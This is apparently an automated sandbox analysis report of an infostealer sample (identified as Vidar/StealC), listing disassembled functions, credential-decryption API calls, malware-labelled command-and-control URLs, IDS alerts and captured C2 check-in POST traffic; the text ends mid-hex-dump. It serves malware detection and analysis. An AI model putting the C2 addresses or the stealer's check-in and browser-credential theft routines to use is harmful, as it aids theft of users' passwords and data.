Part of subcall function 6C5AFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C551A3E,00000048,00000054), ref: 6C5AFD56

Strings

'8\l, xrefs: 6C5C4D07

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8\l
API String ID: 1521942269-1691599768
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: b0a056097441cb581cda8735839d9f6c6028ed98c9aee805329fe0e95ed0fda2
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 14F04F72701224A7EB506DAAAC80E67369CDB4177DF1412B5ED28DF781E731CC0186A2

Function 6C5EAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C5EAF78

Part of subcall function 6C54ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C54ACE2
Part of subcall function 6C54ACC0: malloc.MOZGLUE(00000001), ref: 6C54ACEC
Part of subcall function 6C54ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C54AD02
Part of subcall function 6C54ACC0: TlsGetValue.KERNEL32 ref: 6C54AD3C
Part of subcall function 6C54ACC0: calloc.MOZGLUE(00000001,?), ref: 6C54AD8C
Part of subcall function 6C54ACC0: PR_Unlock.NSS3 ref: 6C54ADC0
Part of subcall function 6C54ACC0: PR_Unlock.NSS3 ref: 6C54AE8C
Part of subcall function 6C54ACC0: free.MOZGLUE(?), ref: 6C54AEAB

memcpy.VCRUNTIME140(6C6B3084,6C6B02AC,00000090), ref: 6C5EAF94

Strings

SSL, xrefs: 6C5EAF73

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: c9efd83e97d974cc7bcc5cf1a0a577a403a05888249cac4f9009835d9e543d05
Instruction ID: 001ad92727ff39bbf42b25ab529e5edcd0281efc7ec193e40548e1f00d4b301f
Opcode Fuzzy Hash: c9efd83e97d974cc7bcc5cf1a0a577a403a05888249cac4f9009835d9e543d05
Instruction Fuzzy Hash: BF214DB2759B499BDB01EF579D833127EF2BB0A209F505128D5180BB25DB31A0289F9D

Function 6C55C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]Ul,6C556499,-00000078,00000000,?,?,]Ul,?,6C555DEF,?), ref: 6C55C821

Part of subcall function 6C551DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C551E0B
Part of subcall function 6C551DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C551E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]Ul,?,6C555DEF,?,?,?), ref: 6C55C857

Strings

]Ul, xrefs: 6C55C810

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]Ul
API String ID: 221937774-3438491895
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: 927c03b37540816317247f3b4bad5a5a929895595b80790cad681fbb4717c5f6
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: 1AF08272A00114A7EF016966AC04ABA36599BD5299F440032FE0496651F736ED3583E1

Function 6C540F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B

Part of subcall function 6C541370: GetSystemInfo.KERNEL32(?,?,?,?,6C540936,?,6C540F20,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000), ref: 6C54138F

PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

Part of subcall function 6C541110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C540936,00000001,00000040), ref: 6C541130
Part of subcall function 6C541110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C540936,00000001,00000040), ref: 6C541142
Part of subcall function 6C541110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C540936,00000001), ref: 6C541167

Strings

clock, xrefs: 6C540F20

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: de101670b7a96f2921b1cc66ad0352fe341ceffa5bd1674eb9b195248c390462
Instruction ID: 5c3c56b248e95ae5a3bcf459e52a5256ff1f3d17e79e0d897190718f50beb4c5
Opcode Fuzzy Hash: de101670b7a96f2921b1cc66ad0352fe341ceffa5bd1674eb9b195248c390462
Instruction Fuzzy Hash: 69D02231608104A2C60023979C84B97B3FCC7C33BAF00CC22E02C01D008A2444FAC37D

Function 6C5B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C5B0DF5
TlsGetValue.KERNEL32 ref: 6C5B0E2D
TlsGetValue.KERNEL32 ref: 6C5B0E58
TlsGetValue.KERNEL32 ref: 6C5B0E84

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 73777e80ac1ec50dbd571da73765fd7b2ac38ebc74fecc48f1630dcf5d1d63d2
Instruction ID: d7a502fa2db6ebe0afce83c0e06a2023f5ffa9a5de9e4059225f0febb910decd
Opcode Fuzzy Hash: 73777e80ac1ec50dbd571da73765fd7b2ac38ebc74fecc48f1630dcf5d1d63d2
Instruction Fuzzy Hash: BB310AF0604390CBDB009F79CE946697FB4BFC6348F114A6BE88997A11EB30D495CB86

Function 017F3B30 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

lstrcat.KERNEL32(?,00000000), ref: 017F3B6A
lstrcat.KERNEL32(?,017FE958), ref: 017F3B87
lstrcat.KERNEL32(?,013BE638), ref: 017F3B9B
lstrcat.KERNEL32(?,017FE95C), ref: 017F3BAD

Part of subcall function 017F3560: wsprintfA.USER32 ref: 017F3579
Part of subcall function 017F3560: FindFirstFileA.KERNEL32(?,?), ref: 017F3590

Part of subcall function 017F3560: StrCmpCA.SHLWAPI(?,017FE8C4), ref: 017F35BE
Part of subcall function 017F3560: StrCmpCA.SHLWAPI(?,017FE8C8), ref: 017F35D4
Part of subcall function 017F3560: FindNextFileA.KERNEL32(000000FF,?), ref: 017F37A9
Part of subcall function 017F3560: FindClose.KERNEL32(000000FF), ref: 017F37BE

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 092668958b3837bdb8b193ece122c2713d8d05a539040954127a84b0fe218c7d
Instruction ID: b60188e110dc060d7ee042ef4880c49e3763b32d22c6dbc6d85e1310448554f4
Opcode Fuzzy Hash: 092668958b3837bdb8b193ece122c2713d8d05a539040954127a84b0fe218c7d
Instruction Fuzzy Hash: 292198BA940209ABCB14FBA0DC5ADDBB77CAB64701F00459CB74A57148EE709789CF61

Function 6C5B0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C552AF5,?,?,?,?,?,6C550A1B,00000000), ref: 6C5B0F1A
malloc.MOZGLUE(00000001), ref: 6C5B0F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5B0F42
TlsGetValue.KERNEL32 ref: 6C5B0F5B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 99e766387b372fc975dfb5abad0e89c4eac1165adc8bd9dbe45d1f771ce7afbb
Instruction ID: 9be25b8089d46cb1ecdbf014cb75a3570b3ff035b34f3c086737fe4fce1efaa5
Opcode Fuzzy Hash: 99e766387b372fc975dfb5abad0e89c4eac1165adc8bd9dbe45d1f771ce7afbb
Instruction Fuzzy Hash: 5F012DF1F002405BE710173B9E545667EACEFD2299F000523DC09D2A11EB31C814C6D7

Source: http://147.45.78.162/a17861b9cb6f1a53.phpX	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/nss3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/freebl3.dll1	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/nss3.dll_=	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: 147.45.78.162/a17861b9cb6f1a53.php	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/softokn3.dllw	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/a17861b9cb6f1a53.php.0//EN	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/mozglue.dllW	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/a17861b9cb6f1a53.php	Avira URL Cloud: Label: malware
Source: http://147.45.78.162	Avira URL Cloud: Label: malware
Source: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll#	Avira URL Cloud: Label: malware

Source: 0.2.jlO7971vUz.exe.17e0000.1.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://147.45.78.162/a17861b9cb6f1a53.php"}
Source: jlO7971vUz.exe.2380.0.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "147.45.78.162/a17861b9cb6f1a53.php"}

Source: http://147.45.78.162/d82daa352ff6e06f/nss3.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/freebl3.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/vcruntime140.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/mozglue.dll	Virustotal: Detection: 10%	Perma Link
Source: 147.45.78.162/a17861b9cb6f1a53.php	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/sqlite3.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/softokn3.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/a17861b9cb6f1a53.php	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll	Virustotal: Detection: 10%	Perma Link
Source: http://147.45.78.162	Virustotal: Detection: 11%	Perma Link
Source: http://147.45.78.162/d82daa352ff6e06f/msvcp140.dll#	Virustotal: Detection: 10%	Perma Link

Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017E9560 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_017E9560
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017F6DB0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_017F6DB0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017E6C40 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_017E6C40
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017E94C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_017E94C0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_017EBFC0 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_017EBFC0
Source: C:\Users\user\Desktop\jlO7971vUz.exe	Code function: 0_2_6C446C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C446C80

Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49705 -> 147.45.78.162:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49705 -> 147.45.78.162:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 147.45.78.162:80 -> 192.168.2.5:49705
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49705 -> 147.45.78.162:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 147.45.78.162:80 -> 192.168.2.5:49705

Source: Malware configuration extractor	URLs: 147.45.78.162/a17861b9cb6f1a53.php
Source: Malware configuration extractor	URLs: http://147.45.78.162/a17861b9cb6f1a53.php

Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBHost: 147.45.78.162Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 46 34 30 34 37 33 46 34 41 30 32 37 34 30 37 32 35 36 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 31 32 33 52 65 62 6f 72 6e 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 44 47 44 48 49 44 42 47 49 45 43 42 47 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="hwid"8CF40473F4A02740725608------KKJDGDHIDBGIECBGHJDBContent-Disposition: form-data; name="build"123Reborn------KKJDGDHIDBGIECBGHJDB--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 147.45.78.162Content-Length: 462Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 48 49 44 42 47 48 4a 4a 4b 46 48 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------CAFBGHIDBGHJJKFHJDHCContent-Disposition: form-data; name="message"browsers------CAFBGHIDBGHJJKFHJDHC--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 147.45.78.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="token"<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 147.45.78.252 Port 80</address></body></html>------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="message"plugins------ECGDHDHJEBGHJKFIECBG--
Source: global traffic	HTTP traffic detected: POST /a17861b9cb6f1a53.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCAHost: 147.45.78.162Content-Length: 462Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 47 48 49 49 4a 4a 4b 46 48 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 34 37 2e 34 35 2e 37 38 2e 32 35 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 4b 4a 44 